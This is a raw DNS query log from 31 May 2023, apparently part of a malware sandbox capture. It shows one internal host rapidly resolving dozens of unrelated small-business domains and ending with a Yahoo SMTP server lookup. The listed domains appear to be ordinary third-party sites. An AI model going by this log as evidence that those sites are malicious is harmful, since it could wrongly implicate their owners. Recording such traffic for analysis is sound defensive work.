                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.985950947 CEST8.8.8.8192.168.2.30x9792No error (0)aevga.com108.167.164.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.166649103 CEST8.8.8.8192.168.2.30x5bc3No error (0)www.edimart.hu81.2.194.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.227087975 CEST8.8.8.8192.168.2.30x5191No error (0)www.waldi.plwaldi.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.227087975 CEST8.8.8.8192.168.2.30x5191No error (0)waldi.pl46.242.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.236974001 CEST8.8.8.8192.168.2.30xf609Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.242264986 CEST8.8.8.8192.168.2.30x2afeNo error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.653852940 CEST8.8.8.8192.168.2.30xad3dNo error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.657614946 CEST8.8.8.8192.168.2.30xbfa1No error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.660372972 CEST8.8.8.8192.168.2.30xcdbcNo error (0)www.pcgrate.com104.21.66.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.660372972 CEST8.8.8.8192.168.2.30xcdbcNo error (0)www.pcgrate.com172.67.201.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.664343119 CEST8.8.8.8192.168.2.30x64e9No error (0)www.crcsi.orgcrcsi.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.664343119 CEST8.8.8.8192.168.2.30x64e9No error (0)crcsi.org165.227.252.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.954222918 CEST8.8.8.8192.168.2.30x22ccNo error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.960412979 CEST8.8.8.8192.168.2.30xd2bdNo error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:31.178523064 CEST8.8.8.8192.168.2.30xd91eNo error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:31.409759998 CEST8.8.8.8192.168.2.30xc70fNo error (0)www.netcr.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:31.409759998 CEST8.8.8.8192.168.2.30xc70fNo error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:31.409759998 CEST8.8.8.8192.168.2.30xc70fNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:31.409759998 CEST8.8.8.8192.168.2.30xc70fNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:31.409789085 CEST8.8.8.8192.168.2.30x4f95No error (0)www.ora-ito.com213.186.33.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:31.412136078 CEST8.8.8.8192.168.2.30xe5aaNo error (0)www.findbc.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:31.412136078 CEST8.8.8.8192.168.2.30xe5aaNo error (0)www.findbc.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:31.416763067 CEST8.8.8.8192.168.2.30x81b4No error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:31.692527056 CEST8.8.8.8192.168.2.30xa2afNo error (0)www.mobilnic.net154.203.14.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:31.860066891 CEST8.8.8.8192.168.2.30xf8f2No error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.163153887 CEST8.8.8.8192.168.2.30x5764No error (0)www.dayvo.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.163153887 CEST8.8.8.8192.168.2.30x5764No error (0)www.dayvo.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.173154116 CEST8.8.8.8192.168.2.30xabadNo error (0)www.fink.com69.163.218.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.179574013 CEST8.8.8.8192.168.2.30x765cNo error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.179574013 CEST8.8.8.8192.168.2.30x765cNo error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.179574013 CEST8.8.8.8192.168.2.30x765cNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.348546028 CEST8.8.8.8192.168.2.30x22e9No error (0)www.lrsuk.comlanguage-recruitment.eu-2.volcanic.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.348546028 CEST8.8.8.8192.168.2.30x22e9No error (0)language-recruitment.eu-2.volcanic.cloudd2kt7vovxa5e81.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.348546028 CEST8.8.8.8192.168.2.30x22e9No error (0)d2kt7vovxa5e81.cloudfront.net18.66.192.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.348546028 CEST8.8.8.8192.168.2.30x22e9No error (0)d2kt7vovxa5e81.cloudfront.net18.66.192.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.348546028 CEST8.8.8.8192.168.2.30x22e9No error (0)d2kt7vovxa5e81.cloudfront.net18.66.192.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.348546028 CEST8.8.8.8192.168.2.30x22e9No error (0)d2kt7vovxa5e81.cloudfront.net18.66.192.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.413074970 CEST8.8.8.8192.168.2.30x4265No error (0)www.stajum.com162.43.120.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.722878933 CEST8.8.8.8192.168.2.30xc9e3No error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.722878933 CEST8.8.8.8192.168.2.30xc9e3No error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.757852077 CEST8.8.8.8192.168.2.30x78edNo error (0)www.pupi.cz103.224.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.874310970 CEST8.8.8.8192.168.2.30x71c4No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:33.331510067 CEST8.8.8.8192.168.2.30x2fb7No error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:33.331510067 CEST8.8.8.8192.168.2.30x2fb7No error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:33.331510067 CEST8.8.8.8192.168.2.30x2fb7No error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:33.331510067 CEST8.8.8.8192.168.2.30x2fb7No error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:33.331510067 CEST8.8.8.8192.168.2.30x2fb7No error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.0.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:33.820192099 CEST8.8.8.8192.168.2.30x98b8No error (0)www.myropcb.com74.208.236.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:35.074445009 CEST8.8.8.8192.168.2.30x96dfNo error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:35.375449896 CEST8.8.8.8192.168.2.30x5081No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:35.826225042 CEST8.8.8.8192.168.2.30xf4c5No error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:35.826225042 CEST8.8.8.8192.168.2.30xf4c5No error (0)d2r2uj0bnofxxz.cloudfront.net99.84.88.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:35.826225042 CEST8.8.8.8192.168.2.30xf4c5No error (0)d2r2uj0bnofxxz.cloudfront.net99.84.88.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:35.826225042 CEST8.8.8.8192.168.2.30xf4c5No error (0)d2r2uj0bnofxxz.cloudfront.net99.84.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:35.826225042 CEST8.8.8.8192.168.2.30xf4c5No error (0)d2r2uj0bnofxxz.cloudfront.net99.84.88.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:36.021099091 CEST8.8.8.8192.168.2.30x6f43No error (0)www.ka-mo-me.com211.1.226.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:37.012913942 CEST8.8.8.8192.168.2.30x3f2fNo error (0)www.com-sit.com172.67.70.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:37.012913942 CEST8.8.8.8192.168.2.30x3f2fNo error (0)www.com-sit.com104.26.10.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:37.012913942 CEST8.8.8.8192.168.2.30x3f2fNo error (0)www.com-sit.com104.26.11.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:38.206168890 CEST8.8.8.8192.168.2.30x95b6No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:38.206168890 CEST8.8.8.8192.168.2.30x95b6No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:39.052289009 CEST8.8.8.8192.168.2.30x54b2No error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:40.257003069 CEST8.8.8.8192.168.2.30x685No error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:40.266386032 CEST8.8.8.8192.168.2.30xd1abNo error (0)www.kernsafe.com104.26.3.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:40.266386032 CEST8.8.8.8192.168.2.30xd1abNo error (0)www.kernsafe.com172.67.72.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:40.266386032 CEST8.8.8.8192.168.2.30xd1abNo error (0)www.kernsafe.com104.26.2.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:41.778063059 CEST8.8.8.8192.168.2.30x5f7aNo error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:41.793642998 CEST8.8.8.8192.168.2.30xe88fNo error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:42.057226896 CEST8.8.8.8192.168.2.30xc6efNo error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:42.057226896 CEST8.8.8.8192.168.2.30xc6efNo error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:42.517349005 CEST8.8.8.8192.168.2.30x1358No error (0)www.x0c.com185.53.177.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:42.981800079 CEST8.8.8.8192.168.2.30xcName error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:44.351535082 CEST8.8.8.8192.168.2.30x637aNo error (0)www.fnsds.orgcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:44.351535082 CEST8.8.8.8192.168.2.30x637aNo error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:44.351535082 CEST8.8.8.8192.168.2.30x637aNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.228.163.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:44.351535082 CEST8.8.8.8192.168.2.30x637aNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.197.121.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:44.677417040 CEST8.8.8.8192.168.2.30x9848No error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:44.776107073 CEST8.8.8.8192.168.2.30xc97No error (0)www.pohlfood.compohlfood.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:44.776107073 CEST8.8.8.8192.168.2.30xc97No error (0)pohlfood.com104.218.10.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.286834955 CEST8.8.8.8192.168.2.30xbd26No error (0)www.tyrns.com62.75.216.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.114433050 CEST8.8.8.8192.168.2.30xc35cNo error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.120810032 CEST8.8.8.8192.168.2.30x46dbNo error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.320025921 CEST8.8.8.8192.168.2.30xe7a4No error (0)www.tc17.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.320025921 CEST8.8.8.8192.168.2.30xe7a4No error (0)www.tc17.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.635704041 CEST8.8.8.8192.168.2.30xed4fNo error (0)www.railbook.net103.224.212.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.944744110 CEST8.8.8.8192.168.2.30x8b45No error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.944744110 CEST8.8.8.8192.168.2.30x8b45No error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:47.999006033 CEST8.8.8.8192.168.2.30x7322No error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.223726988 CEST8.8.8.8192.168.2.30x48e5No error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.223726988 CEST8.8.8.8192.168.2.30x48e5No error (0)d2r2uj0bnofxxz.cloudfront.net99.84.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.223726988 CEST8.8.8.8192.168.2.30x48e5No error (0)d2r2uj0bnofxxz.cloudfront.net99.84.88.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.223726988 CEST8.8.8.8192.168.2.30x48e5No error (0)d2r2uj0bnofxxz.cloudfront.net99.84.88.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.223726988 CEST8.8.8.8192.168.2.30x48e5No error (0)d2r2uj0bnofxxz.cloudfront.net99.84.88.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.417203903 CEST8.8.8.8192.168.2.30x6a96No error (0)www.ka-mo-me.com211.1.226.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.633390903 CEST8.8.8.8192.168.2.30xc841No error (0)www.nunomira.comnunomira.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.633390903 CEST8.8.8.8192.168.2.30xc841No error (0)nunomira.com192.241.158.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.142790079 CEST8.8.8.8192.168.2.30x349bName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.243830919 CEST8.8.8.8192.168.2.30x50e1No error (0)www.vexcom.com104.21.55.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.243830919 CEST8.8.8.8192.168.2.30x50e1No error (0)www.vexcom.com172.67.173.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.408185005 CEST8.8.8.8192.168.2.30xdfb5No error (0)www.sjbs.orgsjbs.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.408185005 CEST8.8.8.8192.168.2.30xdfb5No error (0)sjbs.org69.163.239.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.550683022 CEST8.8.8.8192.168.2.30x89baNo error (0)www.com-sit.com172.67.70.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.550683022 CEST8.8.8.8192.168.2.30x89baNo error (0)www.com-sit.com104.26.10.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.550683022 CEST8.8.8.8192.168.2.30x89baNo error (0)www.com-sit.com104.26.11.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.241432905 CEST8.8.8.8192.168.2.30xf1fbNo error (0)www.maktraxx.commaktraxx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.241432905 CEST8.8.8.8192.168.2.30xf1fbNo error (0)maktraxx.com72.44.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.298741102 CEST8.8.8.8192.168.2.30x7b67Name error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.315536022 CEST8.8.8.8192.168.2.30x3b12No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.315536022 CEST8.8.8.8192.168.2.30x3b12No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.326387882 CEST8.8.8.8192.168.2.30xeb9aServer failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.819408894 CEST8.8.8.8192.168.2.30xe0d6No error (0)www.cel-cpa.com104.196.26.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.835504055 CEST8.8.8.8192.168.2.30x17c0No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.835504055 CEST8.8.8.8192.168.2.30x17c0No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.085517883 CEST8.8.8.8192.168.2.30x4a57No error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.708405972 CEST8.8.8.8192.168.2.30xceb8No error (0)www.fe-bauer.de3.65.101.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.851037025 CEST8.8.8.8192.168.2.30x27a8Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.007756948 CEST8.8.8.8192.168.2.30xfb70No error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.410028934 CEST8.8.8.8192.168.2.30x7b46Name error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.434724092 CEST8.8.8.8192.168.2.30x8087No error (0)www.kernsafe.com172.67.72.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.434724092 CEST8.8.8.8192.168.2.30x8087No error (0)www.kernsafe.com104.26.3.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.434724092 CEST8.8.8.8192.168.2.30x8087No error (0)www.kernsafe.com104.26.2.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.739815950 CEST8.8.8.8192.168.2.30x68feNo error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:53.191163063 CEST8.8.8.8192.168.2.30x2e8bNo error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:53.191163063 CEST8.8.8.8192.168.2.30x2e8bNo error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:53.474422932 CEST8.8.8.8192.168.2.30x32d8No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:53.491031885 CEST8.8.8.8192.168.2.30xe664Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:53.698410988 CEST8.8.8.8192.168.2.30xc946No error (0)www.x0c.com185.53.177.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:54.268888950 CEST8.8.8.8192.168.2.30xbd28No error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:54.342551947 CEST8.8.8.8192.168.2.30x1f64Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:55.225388050 CEST8.8.8.8192.168.2.30xf79bNo error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:55.861567020 CEST8.8.8.8192.168.2.30x4e85No error (0)www.railbook.net103.224.212.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:55.997407913 CEST8.8.8.8192.168.2.30xc2Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:56.035406113 CEST8.8.8.8192.168.2.30xc2Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:57.856606007 CEST8.8.8.8192.168.2.30x50fbNo error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:59.226703882 CEST8.8.8.8192.168.2.30xa395Name error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:59.518865108 CEST8.8.8.8192.168.2.30xca24No error (0)www.fnsds.orgcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:59.518865108 CEST8.8.8.8192.168.2.30xca24No error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:59.518865108 CEST8.8.8.8192.168.2.30xca24No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.197.121.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:59.518865108 CEST8.8.8.8192.168.2.30xca24No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.228.163.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.024590969 CEST8.8.8.8192.168.2.30x2f8fNo error (0)www.pohlfood.compohlfood.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.024590969 CEST8.8.8.8192.168.2.30x2f8fNo error (0)pohlfood.com104.218.10.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.412328005 CEST8.8.8.8192.168.2.30xf735No error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.471997976 CEST8.8.8.8192.168.2.30xde79No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.049791098 CEST8.8.8.8192.168.2.30xa387No error (0)www.tyrns.com62.75.216.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.363147020 CEST8.8.8.8192.168.2.30x9497No error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.363147020 CEST8.8.8.8192.168.2.30x9497No error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.526874065 CEST8.8.8.8192.168.2.30x99dNo error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.732988119 CEST8.8.8.8192.168.2.30x838cNo error (0)www.tc17.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.732988119 CEST8.8.8.8192.168.2.30x838cNo error (0)www.tc17.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:04.356182098 CEST8.8.8.8192.168.2.30x5330No error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:06.549943924 CEST8.8.8.8192.168.2.30x7e7fNo error (0)smtp.mail.yahoo.comsmtp.mail.global.gm0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:06.549943924 CEST8.8.8.8192.168.2.30x7e7fNo error (0)smtp.mail.global.gm0.yahoodns.net87.248.97.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:06.895890951 CEST8.8.8.8192.168.2.30x7186No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
